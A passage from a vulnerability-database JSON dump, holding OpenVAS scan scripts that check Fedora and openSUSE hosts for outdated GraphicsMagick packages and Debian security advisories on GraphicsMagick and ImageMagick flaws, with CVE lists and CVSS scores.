either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876546\");\n script_version(\"2019-07-04T09:58:18+0000\");\n script_cve_id(\"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11474\", \"CVE-2019-11473\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:58:18 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-01 02:10:46 +0000 (Mon, 01 Jul 2019)\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2019-425a1aa7c9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-425a1aa7c9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the FEDORA-2019-425a1aa7c9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\");\n\n script_tag(name:\"affected\", value:\"'GraphicsMagick' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.32~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-05T18:45:24", "description": "The remote host is missing an update for the 'GraphicsMagick' package(s) announced via the FEDORA-2019-da4c20882c advisory.", "cvss3": {}, "published": "2019-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2019-da4c20882c", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-14997", 
"CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-13736", "CVE-2017-13648", "CVE-2017-11638", "CVE-2017-17503", "CVE-2019-11474", "CVE-2017-12805", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-13065", "CVE-2017-12806", "CVE-2017-11642", "CVE-2017-14733", "CVE-2017-16545", "CVE-2019-11472", "CVE-2019-11470", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-14649", "CVE-2019-11473"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310876545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876545", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876545\");\n script_version(\"2019-07-04T09:58:18+0000\");\n script_cve_id(\"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11474\", \"CVE-2019-11473\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:58:18 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-01 02:10:17 +0000 (Mon, 01 Jul 2019)\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2019-da4c20882c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-da4c20882c\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the FEDORA-2019-da4c20882c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\");\n\n script_tag(name:\"affected\", value:\"'GraphicsMagick' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.32~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:34:54", "description": "The remote host is missing an update for the 'GraphicsMagick' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2016-05-19T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for GraphicsMagick (openSUSE-SU-2016:1326-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851317", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310851317", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851317\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-19 05:22:09 +0200 (Thu, 19 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for GraphicsMagick (openSUSE-SU-2016:1326-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", 
value:\"This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061]\n (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)\");\n\n script_tag(name:\"affected\", value:\"GraphicsMagick on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1326-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-debuginfo\", rpm:\"GraphicsMagick-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-debugsource\", rpm:\"GraphicsMagick-debugsource~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-devel\", rpm:\"GraphicsMagick-devel~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick++-Q16-3\", rpm:\"libGraphicsMagick++-Q16-3~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick++-Q16-3-debuginfo\", rpm:\"libGraphicsMagick++-Q16-3-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick++-devel\", rpm:\"libGraphicsMagick++-devel~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick-Q16-3\", rpm:\"libGraphicsMagick-Q16-3~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick-Q16-3-debuginfo\", rpm:\"libGraphicsMagick-Q16-3-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick3-config\", rpm:\"libGraphicsMagick3-config~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagickWand-Q16-2\", rpm:\"libGraphicsMagickWand-Q16-2~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagickWand-Q16-2-debuginfo\", rpm:\"libGraphicsMagickWand-Q16-2-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-GraphicsMagick\", rpm:\"perl-GraphicsMagick~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-GraphicsMagick-debuginfo\", rpm:\"perl-GraphicsMagick-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-05T05:18:07", "description": "\nThe NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. 
Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2022-08-05T05:18:04", "id": "OSV:DLA-1231-1", "href": "https://osv.dev/vulnerability/DLA-1231-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:19:46", "description": "\nVarious security issues were found and fixed in graphicsmagick in 
Debian\nwheezy LTS.\n\n\n* [CVE-2016-7446](https://security-tracker.debian.org/tracker/CVE-2016-7446)\nHeap buffer overflow issue in MVG/SVG rendering.\n* [CVE-2016-7447](https://security-tracker.debian.org/tracker/CVE-2016-7447)\nHeap overflow of the EscapeParenthesis() function\n* [CVE-2016-7449](https://security-tracker.debian.org/tracker/CVE-2016-7449)\nTIFF related problems due to use of strlcpy.\n* [CVE-2016-7800](https://security-tracker.debian.org/tracker/CVE-2016-7800)\nFix unsigned underflow leading to heap overflow when\n parsing 8BIM chunk.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u4.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-11T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7446", 
"CVE-2016-7447", "CVE-2016-7449", "CVE-2016-7800"], "modified": "2022-08-05T05:19:44", "id": "OSV:DLA-651-1", "href": "https://osv.dev/vulnerability/DLA-651-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:18:02", "description": "\n* [CVE-2017-13776](https://security-tracker.debian.org/tracker/CVE-2017-13776) /\n [CVE-2017-13777](https://security-tracker.debian.org/tracker/CVE-2017-13777)\ndenial of service issue in ReadXBMImage()\n* [CVE-2017-12935](https://security-tracker.debian.org/tracker/CVE-2017-12935)\nThe ReadMNGImage function in coders/png.c mishandles large MNG\n images, leading to an invalid memory read in the\n SetImageColorCallBack function in magick/image.c.\n* [CVE-2017-12936](https://security-tracker.debian.org/tracker/CVE-2017-12936)\nThe ReadWMFImage function in coders/wmf.c has a use-after-free\n issue for data associated with exception reporting.\n* [CVE-2017-12937](https://security-tracker.debian.org/tracker/CVE-2017-12937)\nThe ReadSUNImage function in coders/sun.c has a colormap\n heap-based buffer over-read.\n* [CVE-2017-13063](https://security-tracker.debian.org/tracker/CVE-2017-13063) /\n [CVE-2017-13064](https://security-tracker.debian.org/tracker/CVE-2017-13064)\nheap-based buffer overflow vulnerability in the function\n GetStyleTokens in coders/svg.c\n* [CVE-2017-13065](https://security-tracker.debian.org/tracker/CVE-2017-13065)\nNULL pointer dereference vulnerability in the function\n SVGStartElement in coders/svg.c\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-31T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2022-08-05T05:17:57", "id": "OSV:DLA-1082-1", "href": "https://osv.dev/vulnerability/DLA-1082-1", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-08-10T07:07:30", "description": "\nSeveral vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\n\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFor the detailed security status of graphicsmagick please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/graphicsmagick](https://security-tracker.debian.org/tracker/graphicsmagick)\n\n\n", "cvss3": {"exploitabilityScore": 3.9, 
"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10794", "CVE-2017-10799", "CVE-2017-10800", "CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11403", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-11722", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-14314", "CVE-2017-14504", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15277", "CVE-2017-15930", "CVE-2017-16352", "CVE-2017-16353", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2017-18219", "CVE-2017-18220", "CVE-2017-18229", "CVE-2017-18230", "CVE-2017-18231", "CVE-2018-5685", 
"CVE-2018-6799", "CVE-2018-9018"], "modified": "2022-08-10T07:07:29", "id": "OSV:DSA-4321-1", "href": "https://osv.dev/vulnerability/DSA-4321-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:13:34", "description": "\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code ([CVE-2016-3714](https://security-tracker.debian.org/tracker/CVE-2016-3714)), make\nHTTP GET or FTP requests ([CVE-2016-3718](https://security-tracker.debian.org/tracker/CVE-2016-3718)), or delete ([CVE-2016-3715](https://security-tracker.debian.org/tracker/CVE-2016-3715)),\nmove ([CVE-2016-3716](https://security-tracker.debian.org/tracker/CVE-2016-3716)), or read ([CVE-2016-3717](https://security-tracker.debian.org/tracker/CVE-2016-3717)) local files.\n\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full removal of\nPLT/Gnuplot decoder, and the need of explicit reference in the filename\nfor the insecure coders.\n\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\n\nWe recommend that you upgrade your imagemagick packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T00:00:00", "type": "osv", "title": "imagemagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5239"], "modified": "2022-07-21T05:54:27", "id": "OSV:DLA-486-1", "href": "https://osv.dev/vulnerability/DLA-486-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T08:25:43", "description": "\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. 
